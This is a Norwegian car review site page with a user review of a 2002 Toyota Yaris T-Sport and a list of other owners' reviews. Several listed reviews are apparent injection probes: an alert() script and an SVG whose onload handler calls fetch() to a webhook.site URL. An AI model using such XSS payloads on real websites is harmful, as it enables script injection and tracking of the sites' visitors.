Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2002 Toyota Yaris 1,5 T-Sport Combi-Coupè 4

Score 6.8/10

Toyota Yaris T Sport er en bil for aktive sjåfører. Et bra valg for dem på utkikk etter en liten driftsikker bil som samtidig har litt ekstra "oomf" til å bruke på motorveien og leke seg med til tider.

Kjøreglede

6 / 10
T-Sport varianten forbedrer de allerede merkverdige kjøreegenskapene til å skape en veldig leken bil. Styringen er direkte og gir veldig god tilbakemelding. Understellet er stivt, veldig stivt. Med en vekt på 940 kg, så føles det kjempeartig å kaste den inn i svinger. Motoren ligger på 106 beskjedne hestekrefter, men den er ivrig i turtallene og holder seg der bra med en tettsteget girkasse. Minner mer om en go-kart enn en "hot-hatch" på godt og vondt.

Kvalitet/driftssikkerhet

6 / 10
Ikke så mye forskjell på en vanlig Yaris. Bilen er skrudd sammen stramt og fint men kvaliteten på både eksteriør og interiør føles som import fra billigkroken hos Toyota. Slitesterk, men gir ikke mye kvalitetsfølelse. T-Sport setene er mer komfortable, men langturer kan fremdeles bli slitsomme på grunn av veistøyet og motor på høye turtall.

Plass/praktiske løsninger

6 / 10
Med høye sitteplasser og utmerket sikt, så føles bilen mye større på innsiden. Det høye taket og de fleksible baksetene gir deg en del muligheter visst det opptstår situasjoner der gjenstander eller folk må forflyttes. Fremdeles en veldig liten bil, du er på feil sted visst du ser etter plass til å oppbevare unger, bikkje og hyttelast.

Økonomi/kostnader

10 / 10
Kanskje noe av det billigste i drift jeg har opplevd. Med riktig vedlikehold og rustbehandlig kan disse gå langt. Ikke mye kompliserte løsninger, noe som gjør dem billig ved vedlikehold og reprasjoner. Motoren (1NZ-FE) har veldig få kjente problemer og blitt produsert til flere biler i snart to tiår. Toyota-driftsikkerhet på sitt beste.

Drivstoff/forbruk

6 / 10
Er ikke like drivstoff-gjerrig som de mindre motorene, men sluker ikke nok til å kjenne på lommeboken. Mitt gjennomsnitt er på 6.6 l/100 km med en kombinasjon av 3/4 langkjøring og 1/4 bykjøring.

Flere vurderinger

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996

Ford Explorer EV (2025)

Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.

Score 8.2

Vurdert av Adams

Ford Kuga (2021)

Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring

Score 8.6

Vurdert av Viggo

Hongqi E-HS9 (2022)

Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!

Score 8.2

Vurdert av MrP85

Mercedes-Benz EQC (2022)

Topp komfort og driftsikker.

Score 9.4

Vurdert av Renna

Polestar 2 (2022)

God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h

Score 8.8

Vurdert av Autofilen

Mercedes-Benz GLE (2020)

Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km

Score 9.6

Vurdert av Hans

BMW 3-Serie (2012)

Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat

Score 8.8

Vurdert av Knappertappen